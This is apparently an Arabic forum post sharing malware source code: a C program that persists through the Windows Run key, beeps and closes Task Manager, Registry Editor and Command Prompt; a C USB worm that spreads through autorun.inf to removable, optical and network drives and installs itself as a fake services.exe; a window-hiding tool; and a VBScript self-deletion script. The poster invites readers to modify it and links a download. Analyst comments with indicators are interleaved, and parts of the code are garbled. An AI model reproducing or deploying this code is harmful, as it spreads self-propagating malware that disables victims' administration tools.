بطلب من أحد الأصدقاء، أقدم لكم أكواد (codes) لبعض الفيروسات.
ملاحظة: أنا لست الكاتب :/
حسنا، لنبدأ بـ annoying crippling virus و هو فيروس مزعج حقا xD
:::> سيقوم هذا الفيروس بإصدار نغمات مزعجة، كما أنه سيبطل Regedit و Command Prompt (CMD)
و Task Manager (أو Gestionnaire des tâches بالفرنسية) بإغلاق نوافذها كلما فُتحت.
يمكنك الاضافة أو التغيير فيه ^^
-------------------------------------------------------
#include "stdafx.h"
#include "windows.h"
// Analyst annotation (behaviour as shown in the listing, for triage and detection):
//   1. Reads the path of its own image and copies it to a file named
//      "Blue Corral.bmp.exe" (double extension, so it looks like a bitmap when
//      file extensions are hidden).
//   2. Writes a value under HKLM\Software\Microsoft\Windows\CurrentVersion\Run
//      so the copy is launched at logon.
//   3. Loops forever: sends WM_CLOSE to any window titled "Windows Task Manager",
//      "Registry Editor", "Command Prompt" or "Close Program", and calls Beep()
//      with a frequency that ramps up and back down in steps of 100.
// Indicators to hunt for: a Run value named SecurityManager pointing at
// "Blue Corral.bmp.exe", and admin tools that close immediately after opening.
// Mitigation: run users without administrative rights (HKLM writes then fail),
// show file extensions, and alert on new values under the Run keys.
// No API return value is checked anywhere in this function.
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
HKEY hKey;
char sd[255];
char path[MAX_PATH];
// State for the tone sweep: Freq is the current Beep frequency, Duration the
// length of each tone, timer counts steps between 0 and 30.
int Freq = 0;
int Duration = 100;
bool Forwards = true;
bool Backwards = false;
int timer = 0;
HWND hWin;
// Self-location followed by a self-copy.
// NOTE(review): sd is not given any starting contents in the visible lines, so
// the drop directory cannot be read off this listing; confirm in a sandbox.
HMODULE GetModH = GetModuleHandle(0);
GetModuleFileName(GetModH, path, 256);
strcat(sd,"\\Blue Corral.bmp.exe");
CopyFile(path,sd,FALSE);
// Persistence: Run-key value whose data is the bare file name (no directory).
// NOTE(review): the quoting of the value name is garbled in the published text.
unsigned char PathToFile[20] = "Blue Corral.bmp.exe";
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, SecurityManager",0,REG_SZ,PathToFile,sizeof(PathToFile));
RegCloseKey(hKey);
// Endless loop with no Sleep(): the Beep() calls are the only delay per pass.
while(1==1)
{
// Window lookup is by exact English title only; FindWindow's result is passed
// to SendMessage without a NULL check.
hWin = FindWindow(NULL,"Windows Task Manager");
SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0);
hWin = FindWindow(NULL,"Registry Editor");
SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0);
hWin = FindWindow(NULL,"Command Prompt");
SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0);
hWin = FindWindow(NULL,"Close Program");
SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0);
// Descending half of the sweep.
if(Backwards==true)
{
Beep(Freq,Duration);
Freq = Freq - 100;
timer = timer - 1;
}
// Direction flips when the step counter reaches either end (0 or 30).
if (timer == 0)
{
Backwards = false;
Forwards = true;
}
if (timer == 30)
{
Backwards = true;
Forwards = false;
}
// Ascending half of the sweep.
if(Forwards==true)
{
Beep(Freq,Duration);
Freq = Freq + 100;
timer = timer + 1;
}
}
// Not reached: the loop above has no exit.
return 0;
}
-------------------------------------------------------
الفيروس الثاني : و هو فيروس < موش نورمال :D > USB virus source [worm]
هذا الفيروس ليس للنسخ و اللصق (copy & paste use) بل هو للغرض التعليمي فقط لأنه حقا قوي جدّا و سيسبب لك متاعب كثيرة :/
لذلك اذا كنت مبتدئا، فلن تستطيع استخدامه، و هذا لمصلحتك، صدّقني ^^
-------------------------------------------------------
#include <windows.h>
#include <stdio.h>
// Marker text that WinMain passes to WriteFile; usable as a content signature
// when triaging affected files.
#define IMSG "|__[__]__/=+-\\ SaveItForLater :] USB Worm /-+=\\__[__]__|"
// Path of the running image; filled in by GetModuleFileName at the top of WinMain.
char me[1024];
// Registry handle used by Startup(); winLogin() declares its own local hKey.
HKEY hKey;
// Table of 24 drive designators that spreadUSB() passes to GetDriveType.
char *drives[] = {"C:","D:","E","F:","G:","H:","I:","J:","K:","L:",
"M:","N:","O:","P:","Q:","R:","S:","T:","U:","V:",
"W:","X:","Y:","Z:"};
// Analyst annotation: propagation thread. Every 120000 ms it walks the drives[]
// table and, depending on GetDriveType, tries to place a copy of the running
// image (`me`) on the drive:
//   DRIVE_REMOVABLE -> autorun.inf with "open=Driver_Update.exe" + Driver_Update.exe
//   DRIVE_CDROM     -> autorun.inf with "open=Worm_Pwn.exe"      + Worm_Pwn.exe
//   DRIVE_REMOTE    -> Upd_Config.exe (no autorun.inf)
// Indicators: those three file names at a drive root, an autorun.inf whose
// open= line names one of them, and a transient autorun.inf created and then
// deleted in the process's current directory.
// Mitigation: keep AutoRun disabled for removable and network drives (the
// NoDriveTypeAutoRun policy), scan removable media on insertion, and block
// execution from removable drives where policy allows.
// No return value from fopen, CopyFile or remove is checked.
// NOTE(review): destination paths are built by appending to the table entries
// themselves, so behaviour past the first pass is not reliable from the listing;
// confirm actual artefacts dynamically in an isolated sandbox.
DWORD WINAPI spreadUSB()
{
while(1)
{
// Two-minute pause between passes.
Sleep(120000);
int i;
for(i = 0;i < 24;i++)
{
if((GetDriveType(drives[i])) == DRIVE_REMOVABLE)
{
char hldPath[50];
char usbFile[30] = "\\Driver_Update.exe";
char autoRun[50] = "[autorun]\r\nopen=Driver_Update.exe";
// autorun.inf is staged in the current directory, copied to the drive root
// (overwriting any existing file), then the staged copy is deleted.
strcpy(hldPath,drives[i]);
strcat(hldPath,"\\autorun.inf");
FILE *fp = fopen("autorun.inf","w");
fprintf(fp,autoRun);
fclose(fp);
CopyFile("autorun.inf",hldPath,0);
remove("autorun.inf");
// Payload copy of the running image onto the drive.
strcat(drives[i],usbFile);
CopyFile(me,drives[i],0);
}
else if((GetDriveType(drives[i])) == DRIVE_CDROM)
{
char cdPath[50];
char cdFile[20] = "\\Worm_Pwn.exe";
char cdAutr[50] = "[autorun]\r\nopen=Worm_Pwn.exe";
// Same staging sequence as above; here CopyFile is told to fail if an
// autorun.inf already exists on the target.
strcpy(cdPath,drives[i]);
strcat(cdPath,"\\autorun.inf");
FILE *fpp = fopen("autorun.inf","w");
fprintf(fpp,cdAutr);
fclose(fpp);
CopyFile("autorun.inf",cdPath,1);
remove("autorun.inf");
strcat(drives[i],cdFile);
CopyFile(me,drives[i],0);
}
else if((GetDriveType(drives[i])) == DRIVE_REMOTE)
{
// Mapped network drives receive only the executable, relying on a user to run it.
char remName[20] = "\\Upd_Config.exe";
strcat(drives[i],remName);
CopyFile(me,drives[i],0);
}
}
}
}
// Analyst annotation: installation and persistence step.
// Copies the running image (`me`) to <Windows directory>\services.exe and, if
// the copy succeeds, points a Run-key value named "services" at it.
// Returns 0 when CopyFile fails (it is called with fail-if-exists set, so an
// already-present file also yields 0) and 1 otherwise, whether or not the
// registry write succeeded.
// Indicators: a services.exe directly in the Windows directory (the genuine
// binary lives in System32) and a value named "services" under
// HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
// Mitigation: both writes need administrative rights on a default install;
// alert on executables created in the Windows directory and on Run-key changes.
BOOL Startup()
{
char dropTo[1024];
GetWindowsDirectory(dropTo,1024);
strcat(dropTo,"\\services.exe");
if((CopyFile(me,dropTo,1)) == 0)
return 0;
else
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey) == ERROR_SUCCESS)
{
// The length passed is strlen(dropTo), i.e. without the terminating NUL;
// the result of RegSetValueEx is not checked.
RegSetValueEx(hKey,"services",0,REG_SZ,(const unsigned char*)dropTo,strlen(dropTo));
RegCloseKey(hKey);
}
return 1;
}
}
// Analyst annotation: nuisance thread. In a loop with no Sleep() it takes the
// current foreground window and overwrites its title with a fixed banner.
// lParam is unused and the function never returns.
// Indicators: window titles replaced by the banner text below, together with
// one thread of the process spinning continuously.
DWORD WINAPI changeTitle(LPVOID lParam)
{
while(1)
{
HWND hWnd = GetForegroundWindow();
SetWindowText(hWnd,"|__[__]__/=+-\\ SaveItForLater :] Worm - illuz1oN /-+=\\__[__]__|");
}
}
// Analyst annotation: writes the LegalNoticeCaption and LegalNoticeText values
// under HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon, which
// Windows shows as a notice before logon.
// Indicators: unexpected text in those two values; remediation includes
// restoring them to the organisation's baseline (or clearing them).
// The key is opened and closed once per value, no return value is checked, and
// the local hKey shadows the file-level one.
void winLogin(void)
{
HKEY hKey;
char szCaption[] = " |__[__]__/=+-\\ illuz1oN /-+=\\__[__]__|";
char szText[] = " |__[__]__/=+-\\ SaveItForLater :] Worm By illuz1oN /-+=\\__[__]__|"
"\nIf you want to remove this worm, contact illuz1oN - "
"\n... AV Companies ~censored~ You ...";
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon",0,KEY_SET_VALUE,&hKey);
RegSetValueEx(hKey,"LegalNoticeCaption",0,REG_SZ,(const unsigned char*)szCaption,sizeof(szCaption));
RegCloseKey(hKey);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon",0,KEY_SET_VALUE,&hKey);
RegSetValueEx(hKey,"LegalNoticeText",0,REG_SZ,(const unsigned char*)szText,sizeof(szText));
RegCloseKey(hKey);
}
// Analyst annotation: entry point of the worm listing. Flow as shown:
//   1. Record own image path in `me`.
//   2. Create a named mutex and exit if it already exists (single-instance guard).
//   3. Call Startup(). When it returns 0, enumerate the current directory and
//      act on entries by name; otherwise call winLogin(), start the
//      changeTitle and spreadUSB threads, and sleep forever.
// Indicators: a mutex named "-+- illuz1oN -+-", plus the file, registry and
// window-title artefacts produced by the functions called here.
// NOTE(review): in the enumeration branch the name tests use == between
// cFileName and a string literal, and CloseHandle is called on hFile in the
// .exe branches without it being opened there. Treat the file-overwrite and
// hide-file behaviour as the author's stated intent rather than demonstrated
// behaviour, and confirm in an isolated sandbox.
int WINAPI WinMain (HINSTANCE hinst,HINSTANCE prhin,LPSTR argsx,int in)
{
GetModuleFileName(0,me,1024);
// Single-instance check; the mutex handle itself is discarded.
CreateMutex(0,0,"-+- illuz1oN -+-");
if(GetLastError() == ERROR_ALREADY_EXISTS)
{
ExitProcess(0);
}
else
{
if((Startup()) == 0)
{
// Installation did not happen (copy failed or target already present):
// walk every entry of the current directory.
char szMask[4] = "*.*";
DWORD ret = 0;
WIN32_FIND_DATA fData;
HANDLE hFind,hFile;
hFind = FindFirstFile(szMask,&fData);
// Intended .txt handling: open the existing file for writing and write IMSG
// (sizeof includes the terminating NUL) at the start of it.
if(fData.cFileName == "*.txt")
{
hFile = CreateFile(fData.cFileName,GENERIC_WRITE,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
if(hFile == INVALID_HANDLE_VALUE)
ExitProcess(0);
else
{
WriteFile(hFile,IMSG,sizeof(IMSG),&ret,0);
CloseHandle(hFile);
}
}
// Intended .exe handling: mark the file system + hidden.
else if(fData.cFileName == "*.exe")
{
SetFileAttributes(fData.cFileName,FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
CloseHandle(hFile);
}
// Same two cases repeated for every further directory entry.
while (FindNextFile(hFind,&fData))
{
if(fData.cFileName == "*.txt")
{
hFile = CreateFile(fData.cFileName,GENERIC_WRITE,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
if(hFile == INVALID_HANDLE_VALUE)
ExitProcess(0);
else
{
WriteFile(hFile,IMSG,sizeof(IMSG),&ret,0);
CloseHandle(hFile);
}
}
else if(fData.cFileName == "*.exe")
{
SetFileAttributes(fData.cFileName,FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
CloseHandle(hFile);
}
}
FindClose(hFind);
}
else
{
// Installation succeeded: set the logon notice, start the two background
// threads (thread handles are discarded) and block the main thread forever.
winLogin();
unsigned long title;
CreateThread(0,0,changeTitle,0,0,&title);
unsigned long virii;
CreateThread(0,0,spreadUSB,0,0,&virii);
Sleep(INFINITE);
}
}
}
-------------------------------------------------------
-------------------------------------------------------
#include <iostream>
#include <windows.h>
#define BUF 1000
// Analyst annotation: console utility that asks for a window title, looks the
// window up with FindWindow (class name NULL, so the match is by title) and
// hides it with ShowWindow(SW_HIDE). The owning process keeps running; only the
// window stops being shown.
// Defender note: hunt for hidden programs by enumerating processes rather than
// visible windows; a process whose top-level window is hidden is still listed.
int main()
{
// Buffer is BUF+1 bytes; getline reads at most BUF-1 characters into it.
char windowName[BUF+1];
std::cout << "Window to hide: ";
std::cin.getline(windowName,BUF);
HWND app = FindWindow(NULL, windowName);
// Nothing happens, and nothing is reported, when no window has that title.
if(app)
ShowWindow(app, SW_HIDE);
return 0;
}
-------------------------------------------------------
أما الفيروس الرابع و الأخير : Self Destruct
يقوم هذا الفيروس بتدمير نفسه... طبعا يمكنك الاستفادة منه اذا ما وضعته مع فيروس آخر ^^
-------------------------------------------------------
' Analyst annotation: self-removal script. It schedules a delete command for the
' next minute with the legacy "at" scheduler, then overwrites its own file with
' a single empty line so the original script text is no longer on disk.
' Indicators: wscript.exe or cscript.exe launching "at ... del /f ...", and a
' script file that has been truncated to an empty line.
' Defender note: alert on scheduled-job creation by script hosts; the job and
' process-creation logs survive even though the script body does not.
Set objShell=WScript.CreateObject("WScript.Shell")
' f holds the script's file name (name only, not the full path).
f=Wscript.ScriptName
Set objShell=WScript.CreateObject("WScript.Shell")
' Target time is the current hour and the current minute plus one.
a=Minute(Now())+1
' Run is called with window style 0 (hidden) and without waiting for completion.
' NOTE(review): the command's target is taken from n, which is not assigned
' anywhere in the visible lines.
objShell.Run"at "&Hour(Now())&":"&a&" del /f "&n,0,false
Dim oFilesys,oFiletxt, sFilename, sPath
Set oFilesys=CreateObject("Scripting.FileSystemObject")
' CreateTextFile with overwrite=true replaces the file named by f with new content.
Set oFiletxt=oFilesys.CreateTextFile(f,true)
oFiletxt.WriteLine("")
oFiletxt.Close'
' Prompts the user with myPrompt and returns the text entered.
' When the script host is cscript.exe the prompt goes to standard output and
' the reply is read from standard input; under any other host an InputBox
' dialog is shown instead.
' Not called anywhere in the visible lines of this listing.
Function UserInput(myPrompt)
' Host detection: compares the last 12 characters of the host's full path.
If UCase( Right(WScript.FullName,12))="\CSCRIPT.EXE"Then
WScript.StdOut.Write myPrompt & " "
UserInput=WScript.StdIn.ReadLine
Else
UserInput=InputBox(myPrompt)
End If
End Function
-------------------------------------------------------
يمكنك تحميل الشيفرات المصدرية (source codes) لهذه الفيروسات من هنا : http://www.fileserve.com/file/kfJDm8X